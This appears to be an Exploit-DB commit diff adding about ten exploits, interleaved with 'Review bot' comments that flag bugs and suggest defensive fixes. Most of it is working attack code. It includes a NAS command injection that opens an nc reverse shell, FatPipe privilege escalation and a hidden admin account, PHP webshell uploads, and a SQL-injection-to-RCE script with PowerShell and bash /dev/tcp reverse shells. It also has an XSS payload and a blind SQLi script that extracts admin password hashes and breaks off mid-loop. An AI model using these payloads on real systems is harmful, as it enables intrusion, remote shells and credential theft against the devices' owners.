DB: 2021-10-23

11 changes to exploits/shellcodes

Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection

OpenSIS 8.0 'modname' - Directory Traversal

Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload

Budget and Expense Tracker System 1.0 - Arbitrary File Upload
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation

WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting
Jetty 9.4.37.v20210219 - Information Disclosure
Clinic Management System 1.0 - SQL injection to Remote Code Execution
Online Course Registration 1.0 - Blind Boolean-Based SQL Injection (Authenticated)

Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)
This commit is contained in:
Offensive Security 2021-10-23 05:02:09 +00:00
parent ae2adf08f1
commit 4f2cf56b31
13 changed files with 1038 additions and 0 deletions


@ -0,0 +1,29 @@
# Exploit Title: Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection
# Date: 15.07.2021
# Discovered by: Jeroen - IT Nerdbox
# Exploit Author: Metin Yunus Kandemir
# Version: sg2000-2000.1331
# Vendor Homepage: https://www.seagate.com/
# Software Link: https://www.seagate.com/tr/tr/support/downloads/item/banas-220-firmware-master-dl/
#!/usr/bin/python3
import requests
import sys
def exec(target, ncIp, ncPort):
print("[!] Please check netcat listener: "+ ncPort)
url = "http://" + target + "/backupmgt/localJob.php?session=fail;nc+"+ncIp+"+"+ncPort+"+-e+/bin/sh%00"
r = requests.get(url = url)
sys.exit(1)
def main(args):
if len(args) != 4:
print("[*] usage: %s targetIp:port ncIp ncPort" % (args[0]))
print("[*] Example:python3 exploit.py 192.168.1.13 192.168.1.22 80")
sys.exit(1)
exec(target=args[1], ncIp=args[2], ncPort=args[3])
if __name__ == "__main__":
main(args=sys.argv)
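Review bot: `exec()` ends with an unconditional `sys.exit(1)` and never looks at `r`, so the script reports failure on every run and the caller cannot tell whether the request was even accepted; check the response and exit non-zero only on an error. Two smaller points in the same hunk: the `#!/usr/bin/python3` line sits below the comment header instead of on line 1, so the shebang is inert, and `exec` shadows a Python builtin (a name such as `trigger` would be clearer). From the defender's side the hunk documents the sink precisely: the `session` value of `/backupmgt/localJob.php` reaches a shell and is terminated with `%00`, so the fix is to validate that parameter against an allow-list rather than strip characters, and access-log entries for `localJob.php` whose `session` value contains `;` or `%00` are the thing to alert on.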


@ -0,0 +1,118 @@
# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)
# Date: 25.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.fatpipeinc.com
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Hidden Backdoor Account (Write Access)
Vendor: FatPipe Networks Inc.
Product web page: https://www.fatpipeinc.com
Affected version: WARP / IPVPN / MPVPN
10.2.2r38
10.2.2r25
10.2.2r10
10.1.2r60p82
10.1.2r60p71
10.1.2r60p65
10.1.2r60p58s1
10.1.2r60p58
10.1.2r60p55
10.1.2r60p45
10.1.2r60p35
10.1.2r60p32
10.1.2r60p13
10.1.2r60p10
9.1.2r185
9.1.2r180p2
9.1.2r165
9.1.2r164p5
9.1.2r164p4
9.1.2r164
9.1.2r161p26
9.1.2r161p20
9.1.2r161p17
9.1.2r161p16
9.1.2r161p12
9.1.2r161p3
9.1.2r161p2
9.1.2r156
9.1.2r150
9.1.2r144
9.1.2r129
7.1.2r39
6.1.2r70p75-m
6.1.2r70p45-m
6.1.2r70p26
5.2.0r34
Summary: FatPipe Networks invented the concept of router-clustering,
which provides the highest level of reliability, redundancy, and speed
of Internet traffic for Business Continuity and communications. FatPipe
WARP achieves fault tolerance for companies by creating an easy method
of combining two or more Internet connections of any kind over multiple
ISPs. FatPipe utilizes all paths when the lines are up and running,
dynamically balancing traffic over the multiple lines, and intelligently
failing over inbound and outbound IP traffic when ISP services and/or
components fail.
FatPipe IPVPN balances load and provides reliability among multiple
managed and CPE based VPNs as well as dedicated private networks. FatPipe
IPVPN can also provide you an easy low-cost migration path from private
line, Frame or Point-to-Point networks. You can aggregate multiple private,
MPLS and public networks without additional equipment at the provider's
site.
FatPipe MPVPN, a patented router clustering device, is an essential part
of Disaster Recovery and Business Continuity Planning for Virtual Private
Network (VPN) connectivity. It makes any VPN up to 900% more secure and
300% times more reliable, redundant and faster. MPVPN can take WANs with
an uptime of 99.5% or less and make them 99.999988% or higher, providing
a virtually infallible WAN. MPVPN dynamically balances load over multiple
lines and ISPs without the need for BGP programming. MPVPN aggregates up
to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
you need to keep your VPN up and running despite failures of service, line,
software, or hardware.
Desc: The application has a hidden administrative account 'cmuser' that has
no password and has write access permissions to the device. The user cmuser
is not visible in Users menu list of the application.
Tested on: Apache-Coyote/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5684
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php
30.05.2016
25.07.2021
--
Overview:
FatPipe Central Manager is a secure web based solution providing a centralized solution
to manage FatPipe's suite of WAN reliability and optimization products. Central Manager
allows you to configure, manage and monitor FatPipe's patented MPSec technology at the
click of a button.
Central Manager = cmuser.
Once authenticated, you get admin rights.
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Strict-Transport-Security: max-age=31536000
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Type: application/json;charset=ISO-8859-1
Content-Length: 118
Date: Fri, 06 Aug 2017 16:37:07 GMT
Connection: close
{"loginRes":"success","userName":"userName","userAccess":"writeAccess","activeUserName":"cmuser","message":"noError"}
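Review bot: the two bare dates `30.05.2016` and `25.07.2021` just above the `--` separator carry no labels; state which is the discovery date and which is the public disclosure date, since that five-year gap is the single most useful fact for anyone assessing exposure. `Tested on: Apache-Coyote/1.1` names a server banner rather than a firmware build; the tested build should be one of the `Affected version` entries. The sample response is the useful part for detection: a `loginServlet` reply carrying `"activeUserName":"cmuser"` together with `"userAccess":"writeAccess"` is the indicator to alert on, and the mitigation is to remove or password-protect that account and make it visible in the Users list. The `Summary:` marketing paragraphs duplicate those in the companion `50342` file and could be trimmed to the `Desc:` section.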


@ -0,0 +1,191 @@
# Exploit Title: FatPipe Networks MPVPN 10.2.2 - Remote Privilege Escalation
# Date: 25.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.fatpipeinc.com
#!/usr/bin/env python3
#
#
# FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Remote Privilege Escalation
#
#
# Vendor: FatPipe Networks Inc.
# Product web page: https://www.fatpipeinc.com
# Affected version: WARP / IPVPN / MPVPN
# 10.2.2r38
# 10.2.2r25
# 10.2.2r10
# 10.1.2r60p82
# 10.1.2r60p71
# 10.1.2r60p65
# 10.1.2r60p58s1
# 10.1.2r60p58
# 10.1.2r60p55
# 10.1.2r60p45
# 10.1.2r60p35
# 10.1.2r60p32
# 10.1.2r60p13
# 10.1.2r60p10
# 9.1.2r185
# 9.1.2r180p2
# 9.1.2r165
# 9.1.2r164p5
# 9.1.2r164p4
# 9.1.2r164
# 9.1.2r161p26
# 9.1.2r161p20
# 9.1.2r161p17
# 9.1.2r161p16
# 9.1.2r161p12
# 9.1.2r161p3
# 9.1.2r161p2
# 9.1.2r156
# 9.1.2r150
# 9.1.2r144
# 9.1.2r129
# 7.1.2r39
# 6.1.2r70p75-m
# 6.1.2r70p45-m
# 6.1.2r70p26
# 5.2.0r34
#
# Summary: FatPipe Networks invented the concept of router-clustering,
# which provides the highest level of reliability, redundancy, and speed
# of Internet traffic for Business Continuity and communications. FatPipe
# WARP achieves fault tolerance for companies by creating an easy method
# of combining two or more Internet connections of any kind over multiple
# ISPs. FatPipe utilizes all paths when the lines are up and running,
# dynamically balancing traffic over the multiple lines, and intelligently
# failing over inbound and outbound IP traffic when ISP services and/or
# components fail.
#
# FatPipe IPVPN balances load and provides reliability among multiple
# managed and CPE based VPNs as well as dedicated private networks. FatPipe
# IPVPN can also provide you an easy low-cost migration path from private
# line, Frame or Point-to-Point networks. You can aggregate multiple private,
# MPLS and public networks without additional equipment at the provider's
# site.
#
# FatPipe MPVPN, a patented router clustering device, is an essential part
# of Disaster Recovery and Business Continuity Planning for Virtual Private
# Network (VPN) connectivity. It makes any VPN up to 900% more secure and
# 300% times more reliable, redundant and faster. MPVPN can take WANs with
# an uptime of 99.5% or less and make them 99.999988% or higher, providing
# a virtually infallible WAN. MPVPN dynamically balances load over multiple
# lines and ISPs without the need for BGP programming. MPVPN aggregates up
# to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
# you need to keep your VPN up and running despite failures of service, line,
# software, or hardware.
#
# Desc: The application suffers from a privilege escalation vulnerability.
# A normal user (group USER, 0) can elevate her privileges by sending a HTTP
# POST request and setting the JSON parameter 'privilege' to integer value
# '1' gaining administrative rights (group ADMINISTRATOR, 1).
#
# Tested on: Apache-Coyote/1.1
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2021-5685
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5685.php
#
#
# 30.05.2016
# 25.07.2021
#
#
import sys
import time#######
import requests################
requests.packages.urllib3.disable_warnings()
if len(sys.argv) !=2:
print
print("********************************************************")
print("* *")
print("* Privilege escalation from USER to ADMINISTRATOR role *")
print("* in *")
print("* FatPipe WARP/IPVPN/MPVPN v10.2.2 *")
print("* *")
print("* ZSL-2021-5685 *")
print("* *")
print("********************************************************")
print("\n[POR] Usage: ./escalator.py [IP]")
sys.exit()
ajpi=sys.argv[1]
print
juzer=raw_input("[UNE] Username: ")
pasvord=raw_input("[UNE] Password: ")
sesija=requests.session()
logiranje={'loginParams':'{\"username\":\"'+juzer+'\",\"password\":\"'+pasvord+'\",\"authType\":0}'}
hederi={'Sec-Ch-Ua' :'\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"92\"',
'Accept' :'application/json, text/javascript, */*; q=0.01',
'X-Requested-With':'XMLHttpRequest',
'Sec-Ch-Ua-Mobile':'?0',
'User-Agent' :'Fatnet/1.b',
'Content-Type' :'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' :'https://'+ajpi,
'Sec-Fetch-Site' :'same-origin',
'Sec-Fetch-Mode' :'cors',
'Sec-Fetch-Dest' :'empty',
'Referer' :'https://'+ajpi+'/fpui/dataCollectionServlet',
'Accept-Encoding' :'gzip, deflate',
'Accept-Language' :'en-US,en;q=0.9',
'Connection' :'close'}
juarel1='https://'+ajpi+'/fpui/loginServlet'
alo=sesija.post(juarel1,headers=hederi,data=logiranje,verify=False)
if not 'success' in alo.text:
print('[GRE] Login error.')
sys.exit()
else:
print('[POR] Authentication successful.')
print('[POR] Climbing the ladder...')
sluba='''
|| || .--._
||====|| __ '---._)
|| ||"")\ Q Q )
||====|| =_/ o /
|| || | \_.-;-'-,._
||====|| | ' o---o )
|| || \ /H __H\ /
||====|| '-' \"")\/ |
|| || _ |_='-)_/
||====|| / '. )
|| || / /
||====|| |___/\| /
|| || |_| | |
||====|| / ) \\ \\
|| || (__/ \___\\
||====|| \_\\
|| || / )
||====|| (__/
'''
for k in sluba:
sys.stdout.write(k)
sys.stdout.flush()
time.sleep(0.01)
juarel2='https://'+ajpi+'/fpui/userServlet?loadType=set&block=userSetRequest'
posta={
'userList':'[{\"userName\":\"'+juzer+'\",\"oldUserName\":\"'+juzer+'\",\"privilege\":\"1\",\"password\":\"'+pasvord+'\",\"action\":\"edit\",\"state\":false}]'
}
stanje=sesija.post(juarel2,headers=hederi,data=posta,verify=False)
if not 'true' in stanje.text:
print('\n[GRE] Something\'s fishy!')
sys.exit()
else:
print('\n[POR] You are now authorized not only to view settings, but to modify them as well. Yes indeed.')
sys.exit()
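Review bot: the `#!/usr/bin/env python3` shebang contradicts the body, which uses the Python 2 `raw_input()` and bare `print` statements; under Python 3 `raw_input` raises `NameError` before any request is sent, so either change the shebang or switch to `input()`. `import time#######` and `import requests################` carry stray hashes. `requests.packages.urllib3.disable_warnings()` combined with `verify=False` silently accepts any certificate, which should at least be stated in the header. The success test `'true' in stanje.text` is loose; parse the JSON and compare the relevant field. For defenders the hunk pins down the control to fix: `userServlet?loadType=set&block=userSetRequest` honours a client-supplied `privilege` value inside `userList`, so the server must derive privilege from the session rather than the request body, and any `userSetRequest` that changes `privilege` for the requesting user is worth alerting on.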


@ -0,0 +1,20 @@
# Exploit Title: Jetty 9.4.37.v20210219 - Information Disclosure
# Date: 2021-10-21
# Exploit Author: Mayank Deshmukh
# Vendor Homepage: https://www.eclipse.org/jetty/
# Software Link: https://repo1.maven.org/maven2/org/eclipse/jetty/jetty-distribution/9.4.37.v20210219/
# Version: 9.4.37.v20210219 and 9.4.38.v20210224
# Tested on: Kali Linux
# CVE : CVE-2021-28164
POC #1 - web.xml
GET /%2e/WEB-INF/web.xml HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
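Review bot: the PoC gives only the request; add the observed response (status line and the first lines of the returned `web.xml`) so a reader can tell a vulnerable server from a patched one. The header lists `9.4.37.v20210219 and 9.4.38.v20210224` under `Version:`, but the title names only 9.4.37; align the two. `POC #1 - web.xml` implies further PoCs that the file does not contain. For detection, requests whose path carries an encoded dot segment (`%2e/`) ahead of `WEB-INF` are the signature to look for in access logs.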


@ -0,0 +1,22 @@
# Exploit Title: OpenSIS 8.0 'modname' - Directory/Path Traversal
# Date: 09-02-2021
# Exploit Author: Eric Salario
# Vendor Homepage: http://www.os4ed.com/
# Software Link: https://opensis.com/download
# Version: 8.0
# Tested on: Windows, Linux
# CVE: CVE-2021-40651
The 'modname' parameter in the 'Modules.php' is vulnerable to local file inclusion vulnerability. This vulnerability can be exploited to expose sensitive information from arbitrary files in the underlying system.
To exploit the vulnerability, someone must login as the "Parent" user, navigate to http://localhost/Modules.php?modname=miscellaneous%2fPortal.php. The 'modname' parameter and requests the Portal.php's contents. By going back a few directory using '..%2f' decoded as '../' it was possible to disclose arbitrary file from the server's filesystem as long as the application has access to the file.
1. Login as "Parent"
2. Open a web proxy such as BurpSuite and capture the requests
3. Navigate to http://localhost/Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login=
4. Check the response
PoC: https://youtu.be/wFwlbXANRCo
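Review bot: the title says `Directory/Path Traversal` and the CSV row says `Directory Traversal`, but the description calls it a local file inclusion; pick one, because for a PHP include sink the two differ in impact (code execution versus file read). The sentence `The 'modname' parameter and requests the Portal.php's contents` is missing words, and `09-02-2021` is ambiguous next to the ISO dates the other entries use. Step 4 `Check the response` should say what a successful response contains. The precondition that a `Parent` login is required belongs in the title as `(Authenticated)`, as the other entries do; the fix is to resolve `modname` against a fixed module map instead of the filesystem.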

exploits/php/webapps/50264.py Executable file

@ -0,0 +1,78 @@
# Exploit Title: Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload
# Date: 03/09/2021
# Exploit Author: a-rey
# Vendor Homepage: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14928
# Version: v1.0
# Tested on: Ubuntu 20.04.3 LTS (Focal Fossa) with XAMPP 8.0.10-0
# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Patient_Appointment_Scheduler_System/v1.0/writeup.md
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import time
import logging
import requests
import argparse
BANNER = """
Patient Appointment Scheduler System v1.0 - Unauthenticated File Upload & Remote Code Execution
by: \033[0m\033[1;31m \033[0m
\033[0m\033[1;32m \033[0m
\033[0m\033[1;33m \033[0m
\033[0m\033[1;34m \033[0m
\033[0m\033[1;35m \033[0m
\033[0m\033[1;36m \033[0m
"""
def exploit(url:str, file:str, delay:int) -> None:
if not os.path.exists(file):
logging.error(f'webshell payload "{file}"" does not exist?')
return
logging.info(f'uploading webshell payload "{os.path.basename(file)}" to {url}/uploads ...')
uploadTime = int(time.time())
r = requests.post(url + '/classes/SystemSettings.php',
files={'img' : (os.path.basename(file), open(file, 'rb'))}, # NOTE: can also use 'cover' field, but this is more inconspicuous
params={'f' : 'update_settings'},
verify=False
)
if not r.ok:
logging.error('HTTP upload request failed')
return
logging.info(f'finding new payload file name on target (+/- {delay} seconds) ...')
for i in range(uploadTime - delay, uploadTime + delay + 1):
r = requests.get(url + f'/uploads/{str(i)}_{os.path.basename(file)}', allow_redirects=False)
logging.debug(f'trying {url}/uploads/{str(i)}_{os.path.basename(file)} ...')
# NOTE: website will send redirects for all files that do not exist
if r.status_code != 302:
logging.success(f'webshell payload found on target at {url}/uploads/{str(i)}_{os.path.basename(file)}')
return
logging.error('failed to find payload on target')
logging.warning('maybe need a larger delay or uploads directory is not writable?')
return
if __name__ == '__main__':
# parse arguments
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER)
parser.add_argument('-u', '--url', help='website URL', type=str, required=True)
parser.add_argument('-p', '--payload', help='PHP webshell file to upload', type=str, required=True)
parser.add_argument('-d', '--delay', help='delay (seconds) for file timestamp in payload name on target', type=int, required=False, default=60)
parser.add_argument('--debug', help='enable debugging output', action='store_true', default=False)
args = parser.parse_args()
# define logger
logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO' if not args.debug else 'DEBUG')
logging.SUCCESS = logging.CRITICAL + 1
logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m')
logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m')
logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m')
logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m')
logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args)
# print banner
print(BANNER)
# run exploit
exploit(args.url, args.payload, args.delay)
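Review bot: `logging.success` is attached to the module only inside the `__main__` block, so `exploit()` raises `AttributeError` on its success path whenever the module is imported rather than run as a script; define the helper at module level next to `exploit`. In the same hunk: `open(file, 'rb')` is never closed (use a `with` block), `verify=False` is set on the POST but not on the follow-up GETs, the f-string `"{file}"" does not exist?'` has a stray quote, and the `#!/usr/bin/env python3` line sits below the comment header, so the shebang does nothing. The comment that `update_settings` accepts both the `img` and `cover` fields without authentication is the useful finding for a fix: both handlers need an authenticated admin session and an extension allow-list, and a timestamp-prefixed `.php` file appearing under `/uploads/` is the artefact to hunt for.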


@ -0,0 +1,52 @@
# Exploit Title: Budget and Expense Tracker System 1.0 - Arbitrary File Upload
# Exploit Author: ()t/\/\1
# Date: 23/09/2021
# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html
# Tested on: Linux
# Version: 2.0
# Exploit Description:
The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands.
# PoC request
POST /expense_budget/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/expense_budget/admin/?page=user
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------1399170066243244238234165712
Content-Length: 824
Connection: close
Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c
-----------------------------1399170066243244238234165712
Content-Disposition: form-data; name="id"
1
-----------------------------1399170066243244238234165712
Content-Disposition: form-data; name="firstname"
A
-----------------------------1399170066243244238234165712
Content-Disposition: form-data; name="lastname"
a
-----------------------------1399170066243244238234165712
Content-Disposition: form-data; name="username"
admin
-----------------------------1399170066243244238234165712
Content-Disposition: form-data; name="password"
-----------------------------1399170066243244238234165712
Content-Disposition: form-data; name="img"; filename="na3na3.php"
Content-Type: image/jpeg
<?php echo "<pre>";system($_GET['cmd']); ?>
-----------------------------1399170066243244238234165712--
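Review bot: `# Version: 2.0` contradicts the `1.0` in the title and in the CSV row; one of them is wrong. The request carries `Cookie: PHPSESSID=...` and a `Referer` under `/admin/`, so the upload needs an authenticated session and the title should say `(Authenticated)`. The description's `these issues` refers to a single issue. For the fix, `Users.php?f=save` must validate the `img` part by extension and content rather than trusting the client-supplied `Content-Type: image/jpeg`, and a `.php` file landing in the upload directory is the indicator to monitor.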


@ -0,0 +1,13 @@
# Exploit Title: WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting (XSS)
# Date: 2/3/2021
# Author: 0xB9
# Software Link: https://downloads.wordpress.org/plugin/redirect-404-to-parent.1.3.0.zip
# Version: 1.3.0
# Tested on: Windows 10
# CVE: CVE-2021-24286
1. Description:
This plugin redirects any 404 request to the parent URL. The tab parameter in the Admin Panel is vulnerable to XSS.
2. Proof of Concept:
wp-admin/options-general.php?page=moove-redirect-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/);
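Review bot: the PoC path `wp-admin/options-general.php?page=moove-redirect-settings&tab=...` lives in the Admin Panel, so the payload only fires for a logged-in user allowed to open that settings page; say so in the description, because it changes the risk rating. The header uses `# Author:` where the other entries use `# Exploit Author:`, and it lacks `# Vendor Homepage:`. The fix is to escape `tab` with `esc_attr()` before it is placed in the attribute, and `onanimationstart=` in a query string is a straightforward WAF or log signature.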

exploits/php/webapps/50439.py Executable file

@ -0,0 +1,98 @@
# Exploit Title: Clinic Management System 1.0 - SQL injection to Remote Code Execution
# Date:21/10/2021
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip
# Version: 1.0
# Tested on: Windows 7 and Ubuntu 21.10
# References: https://medium.com/@Pablo0xSantiago/clinic-management-system-1-0-sql-injection-bypass-to-remote-code-execution-804bceac037e
# Vulnerability: Through SQL injection to bypass the login form it is
possible to upload a malicious file and after use that malicious file to
execute code in the remote system.
# Proof of Concept:
import requests
import sys
import time
session = requests.Session()
#http_proxy = "http://127.0.0.1:8080"
#https_proxy = "https://127.0.0.1:8080"
#proxyDict = {"http" : http_proxy,
# "https" : https_proxy}
def windows(HPW,host,shell_name):
payload =
"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()"""""
host2 = host+'/'+'uploadImage/Logo/' + shell_name + '.php?cmd='+payload
#print(payload)
try:
request_rce = requests.get(host2,timeout=8)
except requests.exceptions.ReadTimeout:
pass
def linux(HPL,host,shell_name):
payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+HPL+'+0>%261"'
host2 = host+'/'+'/uploadImage/Logo/' + shell_name + '.php?cmd='+payload
#print(payload)
try:
request_rce = requests.get(host2,timeout=8)
except requests.exceptions.ReadTimeout:
pass
def main():
host = sys.argv[1]
shell_name = sys.argv[2]
url = host + '/login.php'
values = {'user': "admin",
'email': "' OR 1 -- -",
'password': '',
'btn_login': ""
}
r = session.post(url, data=values)
cookie = session.cookies.get_dict()['PHPSESSID']
data = { 'btn_web':''}
headers= {'Cookie': 'PHPSESSID='+cookie}
request = session.post(host+ '/manage_website.php', data=data,
headers=headers,files={"website_image":(shell_name+'.php',"<?=`$_GET[cmd]`?>")})
print("")
print('[*] Your Simple Webshell was uploaded to ' + host +
'/uploadImage/Logo/' + shell_name + '.php' )
print("")
LHOST = input('[+] Enter your LHOST: ')
LPORT = input('[+] Enter your LPORT: ')
print("")
HPW= "'"+LHOST+"'"+','+LPORT
HPL= ""+LHOST+""+'/'+LPORT
print('[+] Option 1: Windows')
print('[+] Option 2: Linux')
option = input('[+] Choose OS: ')
if option == "1":
windows(HPW,host,shell_name)
exit()
elif option == "2":
linux(HPL,host,shell_name)
exit()
else:
print("Please choose Windows or Linux")
main()
#Usage: python3 host shell_name
#Example: python3 http://localhost/clinic shell
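Review bot: the lines `possible to upload a malicious file and after use that malicious file to` and `execute code in the remote system.` continue the `# Vulnerability:` comment without a leading `#`, so as written the file is not valid Python and fails at parse time; prefix them. Likewise `payload =` on its own line with the string on the next line is a `SyntaxError` unless the two are joined. Logic: `main()` never checks that the login bypass succeeded, so a failed login surfaces as a `KeyError` on `session.cookies.get_dict()['PHPSESSID']` instead of a message; test the response first. `linux()` builds `host+'/'+'/uploadImage/Logo/'`, producing a double slash, and the usage comment omits the script name. For the fix, the `email` field reaching the login query unparameterised and `manage_website.php` storing `website_image` under its client-supplied name are the two defects; prepared statements plus a server-side extension and content check close both.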


@ -0,0 +1,116 @@
# Exploit Title: Online Course Registration 1.0 - Blind Boolean-Based SQL Injection (Authenticated)
# Exploit Author: Sam Ferguson (@AffineSecurity) and Drew Jones (@qhum7sec)
# Date: 2021-10-21
# Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip
# Version: 1.0
# Tested On: Windows 10 + XAMPP + Python 3
# Vulnerability: An attacker can perform a blind boolean-based SQL injection attack, which can provide attackers
# with access to the username and md5 hash of any administrators.
# Vulnerable file: /online-course-registration/Online/pincode-verification.php
# Proof of Concept:
#!/usr/bin/python3
import requests
import sys
import string
def exploit(hostname, username, password):
# Building bruteforce list
pass_list = list(string.ascii_lowercase)
pass_list += list(range(0,10))
pass_list = map(str, pass_list)
pass_list = list(pass_list)
user_list = pass_list
user_list += list(string.ascii_uppercase)
user_list = map(str, user_list)
user_list = list(user_list)
session = requests.Session()
# This URL may change based on the implementation - change as needed
url = f"{hostname}/online-course-registration/Online/index.php"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/index.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"}
data = {"regno": f"{username}", "password": f"{password}", "submit": ''}
r = session.post(url, headers=headers, data=data)
print("Admin username:")
# This range number is pretty arbitrary, so change it to whatever you feel like
for i in range(1,33):
counter = 0
find = False
for j in user_list:
# This URL may change based on the implementation - change as needed
url = f"{hostname}/online-course-registration/Online/pincode-verification.php"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/pincode-verification.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"}
data = {"pincode": f"' or (select(select (substring(username,{i},1)) from admin) = \"{j}\") -- - #", "submit": ''}
a = session.post(url, headers=headers, data=data)
counter += 1
if 'Course Enroll' in a.text:
sys.stdout.write(j)
sys.stdout.flush()
break
elif counter == len(user_list):
find = True
break
if find:
break
print("\n")
print("Admin password hash:")
# This range is not arbitrary and will cover md5 hashing - if the hashing implementation is different, change as needed
for i in range(1,33):
counter = 0
find = False
for j in pass_list:
url = f"{hostname}/online-course-registration/Online/pincode-verification.php"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/pincode-verification.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"}
